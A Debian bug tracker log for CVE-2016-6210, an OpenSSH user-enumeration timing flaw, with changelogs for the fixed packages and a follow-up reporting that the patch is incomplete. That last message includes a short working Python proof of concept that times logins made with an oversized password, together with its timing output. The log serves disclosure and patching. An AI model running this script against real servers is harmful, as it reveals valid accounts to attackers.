openssh: CVE-2016-6210: User enumeration via covert timing channel

Debian Bug report logs - #831902
openssh: CVE-2016-6210: User enumeration via covert timing channel

Toggle useless messages

Message #5 received at submit@bugs.debian.org (full text, mbox, reply):

From: Salvatore Bonaccorso <carnil@debian.org>

To: Debian Bug Tracking System <submit@bugs.debian.org>

Subject: openssh: CVE-2016-6210: User enumeration via covert timing channel

Date: Wed, 20 Jul 2016 19:23:09 +0200

Source: openssh
Version: 1:7.2p2-5
Severity: important
Tags: security upstream patch

Hi,

the following vulnerability was published for openssh.

CVE-2016-6210[0]:
User enumeration via covert timing channel

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2016-6210
[1] http://seclists.org/fulldisclosure/2016/Jul/51

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore

Message #12 received at 831902-close@bugs.debian.org (full text, mbox, reply):

From: Colin Watson <cjwatson@debian.org>

To: 831902-close@bugs.debian.org

Subject: Bug#831902: fixed in openssh 1:7.2p2-6

Date: Fri, 22 Jul 2016 17:26:14 +0000

Source: openssh
Source-Version: 1:7.2p2-6

We believe that the bug you reported is fixed in the latest version of
openssh, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 831902@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Colin Watson <cjwatson@debian.org> (supplier of updated openssh package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Fri, 22 Jul 2016 17:06:19 +0100
Source: openssh
Binary: openssh-client openssh-client-ssh4 openssh-server openssh-sftp-server ssh ssh-krb5 ssh-askpass-gnome openssh-client-udeb openssh-server-udeb
Architecture: source
Version: 1:7.2p2-6
Distribution: unstable
Urgency: medium
Maintainer: Debian OpenSSH Maintainers <debian-ssh@lists.debian.org>
Changed-By: Colin Watson <cjwatson@debian.org>
Description:
 openssh-client - secure shell (SSH) client, for secure access to remote machines
 openssh-client-ssh4 - secure shell (SSH) client for legacy SSH1 protocol
 openssh-client-udeb - secure shell client for the Debian installer (udeb)
 openssh-server - secure shell (SSH) server, for secure access from remote machines
 openssh-server-udeb - secure shell server for the Debian installer (udeb)
 openssh-sftp-server - secure shell (SSH) sftp server module, for SFTP access from remot
 ssh        - secure shell client and server (metapackage)
 ssh-askpass-gnome - interactive X program to prompt users for a passphrase for ssh-ad
 ssh-krb5   - secure shell client and server (transitional package)
Closes: 714526 751636 766887 822997 823827 831902
Changes:
 openssh (1:7.2p2-6) unstable; urgency=medium
 .
   * debian/watch: Switch to HTTP (thanks, Nicholas Luedtke; closes:
     #822997).
   * Copy summary of supported SFTP protocol versions from upstream's
     PROTOCOL file into the openssh-sftp-server package description (closes:
     #766887).
   * Set SSH_PROGRAM=/usr/bin/ssh4 when building openssh-client-ssh4 so that
     scp1 works (reported by Olivier MATZ).
   * Retroactively add a NEWS.Debian entry for the UseDNS change in 6.9 (see
     LP #1588457).
   * CVE-2016-6210: Mitigate user enumeration via covert timing channel
     (closes: #831902).
   * Backport upstream patch to close ControlPersist background process
     stderr when not in debug mode or when logging to a file or syslog
     (closes: #714526).
   * Add a session cleanup script and a systemd unit file to trigger it,
     which serves to terminate SSH sessions cleanly if systemd doesn't do
     that itself, often because libpam-systemd is not installed (thanks,
     Vivek Das Mohapatra, Tom Hutter, and others; closes: #751636).
   * Stop generating DSA host keys by default (thanks, Santiago Vila; closes:
     #823827).
Checksums-Sha1:
 2170a722d423c610aebff6c7d46851fb88316348 2837 openssh_7.2p2-6.dsc
 74c23afda7155665754613e32106434aa5ae105f 154028 openssh_7.2p2-6.debian.tar.xz
Checksums-Sha256:
 2e071288cb930a73414d8cd2c4050b8db583970df13ec7ee47a0150c87b8382e 2837 openssh_7.2p2-6.dsc
 d02a0ad674537b470348807e522496f3c06f7893bfd11b5de809a9cfa5b1176f 154028 openssh_7.2p2-6.debian.tar.xz
Files:
 6b199afe03c15f81d0e758383fee1200 2837 net standard openssh_7.2p2-6.dsc
 15f3b542b8e3378a329acd5eb86ac9a8 154028 net standard openssh_7.2p2-6.debian.tar.xz

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1
Comment: Colin Watson <cjwatson@debian.org> -- Debian developer

iQIVAwUBV5JHkDk1h9l9hlALAQj+hQ/+PBz3IIxgy7hxdy/H+j3nIBIk6nhRV3By
gVQIkNo7t0mnSlfQmQtyVrdzuPuiwItLgYzhNOODIyAqNBxuQVLbv3bNH1Y9n3Do
2SB+KTAxHoKIqF2323r1n0OjIlpot7aI8uX6jZ+Cv5BMQwwtZMqgmlwJll1PUeSL
LVbGVOwy3iOZcNpSAWi7LRcoRMdsNi5myqFB03exOq3026zDmjGEUgrpJC6Dhjyi
lQ64vS/neB97Ww8XtWRclmdnTA0d2VuTS5uvzTGVihV2VZtaRi6WTl4kbiABYRES
YnYFcKQnV4rI7yXTGLXzBeSmWowanzeGW8ppFg3HYQx43rR9pJ/UYX/g2PVVqVvx
Y+W9t10AMX7Fn9PnbY905nAig4kp3GgOWqV5tTaaupVzWXlPIlOmKNvvfnuCJJDk
P3U5vIMueTt+7FOapcbj6MnMktLeoqwrij0alD4CiLF0KTo1PCLM/mkQY76tBwEP
UcbSMBlFhsy4OBLq3qOR017NSo1TXdfSF7CpA/VB9bzbJkHULuVs17G/oHhBV4X/
6QH1AiH0bLReuTxCqbD/uoIjMbOkCjvUHCUbXGdXSMctyv1zYiw7uZJwpB6XU0Do
vmuKMn2IoDtow5OlSD0akLRaXTaNCH2N8Kg5pgPVzIG5XUiJZWoS4U6b8lzuzctz
/2yteQ0fDcQ=
=33BL
-----END PGP SIGNATURE-----

Message #17 received at 831902-close@bugs.debian.org (full text, mbox, reply):

From: Laszlo Boszormenyi (GCS) <gcs@debian.org>

To: 831902-close@bugs.debian.org

Subject: Bug#831902: fixed in openssh 1:6.7p1-5+deb8u3

Date: Sun, 24 Jul 2016 19:02:57 +0000

Source: openssh
Source-Version: 1:6.7p1-5+deb8u3

We believe that the bug you reported is fixed in the latest version of
openssh, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 831902@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Laszlo Boszormenyi (GCS) <gcs@debian.org> (supplier of updated openssh package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256

Format: 1.8
Date: Thu, 21 Jul 2016 15:51:59 +0000
Source: openssh
Binary: openssh-client openssh-server openssh-sftp-server ssh ssh-krb5 ssh-askpass-gnome openssh-client-udeb openssh-server-udeb
Architecture: source amd64 all
Version: 1:6.7p1-5+deb8u3
Distribution: jessie-security
Urgency: high
Maintainer: Debian OpenSSH Maintainers <debian-ssh@lists.debian.org>
Changed-By: Laszlo Boszormenyi (GCS) <gcs@debian.org>
Description:
 openssh-client - secure shell (SSH) client, for secure access to remote machines
 openssh-client-udeb - secure shell client for the Debian installer (udeb)
 openssh-server - secure shell (SSH) server, for secure access from remote machines
 openssh-server-udeb - secure shell server for the Debian installer (udeb)
 openssh-sftp-server - secure shell (SSH) sftp server module, for SFTP access from remot
 ssh        - secure shell client and server (metapackage)
 ssh-askpass-gnome - interactive X program to prompt users for a passphrase for ssh-ad
 ssh-krb5   - secure shell client and server (transitional package)
Closes: 831902
Changes:
 openssh (1:6.7p1-5+deb8u3) jessie-security; urgency=high
 .
   * Non-maintainer upload by the Security Team.
   * CVE-2016-6210: User enumeration via covert timing channel
     (closes: #831902).
Checksums-Sha1:
 bff143012193cc818be87fb2cc85a701e4dd94fc 2709 openssh_6.7p1-5+deb8u3.dsc
 7c31b32b12a8b9aadc9b3e8fbee3b56dc8f0795f 150272 openssh_6.7p1-5+deb8u3.debian.tar.xz
 868ac10a0246f4601fb91075e5999cca4b4e21ab 690360 openssh-client_6.7p1-5+deb8u3_amd64.deb
 725cfad83f996522a8a83e7119d53a6da67398d0 331268 openssh-server_6.7p1-5+deb8u3_amd64.deb
 2af338add69ac295737b61d718b92dca84d9ebba 37996 openssh-sftp-server_6.7p1-5+deb8u3_amd64.deb
 7addc7869745a752f2af72d3499da3f37b435274 119790 ssh_6.7p1-5+deb8u3_all.deb
 f00b777707ce403ec1cc2e6851a8f5d281d91748 119334 ssh-krb5_6.7p1-5+deb8u3_all.deb
 d50a45e202a6e66594ed050493b4135516c9a527 127466 ssh-askpass-gnome_6.7p1-5+deb8u3_amd64.deb
 6b7b8b1d27ed4ca3581894dac5827cc895cfff88 259646 openssh-client-udeb_6.7p1-5+deb8u3_amd64.udeb
 ebbe59699881d10e25233a3db9ea1f40f615d63d 286308 openssh-server-udeb_6.7p1-5+deb8u3_amd64.udeb
Checksums-Sha256:
 3680d33c9638af9d0f249bee3444b490b0a1fa4ea11a04e1b97fe6e081ce8537 2709 openssh_6.7p1-5+deb8u3.dsc
 a2f486b45310b86816fbd5b85ad61493d9b07ac3290a7b4f773747e7a47b6759 150272 openssh_6.7p1-5+deb8u3.debian.tar.xz
 0cfb382650c3263349f4829f3423833c650cb0c665b731be66d5d72f9779099d 690360 openssh-client_6.7p1-5+deb8u3_amd64.deb
 0376c483b3bfe1c12e87744b11391a47c8f40eecce629c00176535a716761a58 331268 openssh-server_6.7p1-5+deb8u3_amd64.deb
 19d84f32345060bbc79522f8e9ed773d28a37edb5d9cd8cf83384f27f848a220 37996 openssh-sftp-server_6.7p1-5+deb8u3_amd64.deb
 257a7a22101067758b9b95792d3f6f5705b8a5b00b14f0ef63553db28b4eb45e 119790 ssh_6.7p1-5+deb8u3_all.deb
 78bfef7c0299c70fc35aa9af601d2512ffb63bffd32ee75dbd92fa4885528a8a 119334 ssh-krb5_6.7p1-5+deb8u3_all.deb
 e56238724132239d530fd7cd92679b4e4f5b6bc4c4b9dec1c5f543b82c2dbd03 127466 ssh-askpass-gnome_6.7p1-5+deb8u3_amd64.deb
 463a40912de0499820501026ee29284ab4429b97a24cac34c1b9ff6be410f243 259646 openssh-client-udeb_6.7p1-5+deb8u3_amd64.udeb
 938912669db7b2bc924e3ac202c8142342334e12b018db2a8fb0bc3ec1dd61a9 286308 openssh-server-udeb_6.7p1-5+deb8u3_amd64.udeb
Files:
 4a60c718008cad0c665a7e354a9d02da 2709 net standard openssh_6.7p1-5+deb8u3.dsc
 c95ae888817d1c3cb77453453846f32e 150272 net standard openssh_6.7p1-5+deb8u3.debian.tar.xz
 1d6685072b0fbb99480eba30d2da0d46 690360 net standard openssh-client_6.7p1-5+deb8u3_amd64.deb
 7dce77acd12b801bb5d5d901f4380d3f 331268 net optional openssh-server_6.7p1-5+deb8u3_amd64.deb
 c29c13fd32670a16464b805a41790608 37996 net optional openssh-sftp-server_6.7p1-5+deb8u3_amd64.deb
 18ab5922af1b6841078eb9bab46cb2ef 119790 net extra ssh_6.7p1-5+deb8u3_all.deb
 1f779b09429f37d9d3a37c9b59370c45 119334 oldlibs extra ssh-krb5_6.7p1-5+deb8u3_all.deb
 995528c208b70003a697fbd9b52aa577 127466 gnome optional ssh-askpass-gnome_6.7p1-5+deb8u3_amd64.deb
 c657a8c5bfb1043a7e62bba3134e81ca 259646 debian-installer optional openssh-client-udeb_6.7p1-5+deb8u3_amd64.udeb
 fc39fa3123e64058e1bec2201a169e5c 286308 debian-installer optional openssh-server-udeb_6.7p1-5+deb8u3_amd64.udeb

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1

iQIcBAEBCAAGBQJXklxPAAoJENzjEOeGTMi/xf8P/2yfRdRdVjyyJwwNS2LVfhjf
fODvgyZwOpP20WTl59hCYqKIOZDkU27/QuHZl1s9qTuroPD8jgApKTg0slNdaaxV
TKOjPnsR2SsgdPDQTR9Fuemg9dBtQkDNEC8jwbbSZtEugpf5pSaC7kx8O2K3jIaP
ar2w2ZLmCPIp2lI5QceauE51H1p/yrQjmTKQIXNhMaEK0di/JWS3xnNtr3ebcU6S
0bGCA+p7Xtz/1QyRp0DfEIvz4YWLY3BOu1fVIe/4klvRP61KYca+fmKM2xR6rHmD
+rm+m2Bkq5jKUeMWoZYvFJZrG4ZKLVunAiOjCKQarJo26jv8k3oTZeRiUxGq6bbe
U+OaGFPO8bLra0dMMVwoOmLtSnJh+Nsiid5gA614wFbgCByQfUSWuoUB1/LRb8uX
yqV/h7TT8FRn3UcmYINSHmElJd2sxqtKFNzyFj36hpqvNAR4YJS7+2TlKeFRWDfW
nqF5diL/t9HRyPrnp470+6hP6Yo+vsAHbVxjmzEHow/6owXNq9Hu3aObvd3/Nm2T
EHivh4/uBhaQxDx/MhA3nww6QV1WSBCvU+etmt81XZfbKikbJkr8SpqKgBzIa0O2
X8yy1wjRwZeu1bnOyBpDYBpgTHTYNBvg2BUZ+MQZMDIMC77kNroyEtaetDp6ISJX
slWc0rME/RpipSnslVKG
=jEOy
-----END PGP SIGNATURE-----

Message #22 received at 831902@bugs.debian.org (full text, mbox, reply):

From: Michael Van Delft <michael@xo.tc>

To: 831902@bugs.debian.org

Subject: SSH User Enumeration issue still present

Date: Wed, 27 Jul 2016 11:02:24 +0800

I have installed this patch on a few servers however the timing issue still 
seems to be present.

I tried setting up a fresh server using the netinst .iso file and I only 
installed the "SSH server" package in the Software selection stage (no other 
packages were install or configuration changes made). I ensured that all the 
packages were up to date.

michael@ssh-test-box:~$ sudo sshd -v
[sudo] password for michael: 
unknown option -- v
OpenSSH_6.7p1 Debian-5+deb8u3, OpenSSL 1.0.1t  3 May 2016
usage: sshd [-46DdeiqTt] [-b bits] [-C connection_spec] [-c host_cert_file]
            [-E log_file] [-f config_file] [-g login_grace_time]
            [-h host_key_file] [-k key_gen_time] [-o option] [-p port]
            [-u len]

Then I ran the POC code (below) and valid users took 22 seconds to fail while 
no invalid users took around 3 seconds.

Setting PasswordAuthentication no in /etc/ssh/sshd_config mitigates this issue.

[michael@ezreal ~]$ python ssh_test.py 
user: alice
0:00:02.039722
[michael@ezreal ~]$ python ssh_test.py 
user: bob
0:00:02.613451
[michael@ezreal ~]$ python ssh_test.py 
user: michael
0:00:22.195203
[michael@ezreal ~]$ python ssh_test.py 
user: eve
0:00:03.564072


# ssh_test.py
import paramiko
from datetime import datetime
user=input("user: ")
p='A'*25000
ssh = paramiko.SSHClient()
starttime=datetime.now()
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
try:
        ssh.connect('ssh-test-box.internal', username=user,
        password=p)
except:
        endtime=datetime.now()
total=endtime-starttime
print(total)

Send a report that this bug log contains spam.